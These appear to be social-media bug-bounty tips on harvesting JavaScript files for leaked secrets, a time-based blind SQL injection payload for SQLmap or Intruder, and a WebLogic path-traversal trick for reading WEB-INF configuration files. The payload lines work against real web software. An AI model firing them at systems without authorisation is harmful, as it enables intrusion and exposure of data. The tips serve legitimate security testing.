Easy P1 🙃
1: Collect all the Js files by using the developer tool on mozila
2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool
3: Now check manually sensitive keyword js file
#bugbounty#bugbountytips#security
🙃
1: Gather all the POST parameters using @BurpBounty Pro Extension or using Param Miner Tool
2: Use SQLmap or intruder list on each parameter
Payload : (select*from(select(sleep(5)))a)
#bugbountytips#bugbounty#hacking#pentesting
Just scored a 4 Digit Bounty on @YogoshaOfficial
1 : Get all the URL from wayback / Gau
2 : Filter out the js file using httpx
3 : Check Mnauly all the js file or you can use nuclei template or used @trufflesec chrome extension
#BugBounty#bugbountytips
Oracle WebLogic Server LFI
#Bogbounty#bugbountytips#bugbountytip
Payload used :
GET .//META-INF/MANIFEST.MF
GET .//WEB-INF/web.xml
GET .//WEB-INF/portlet.xml
GET .//WEB-INF/weblogic.xml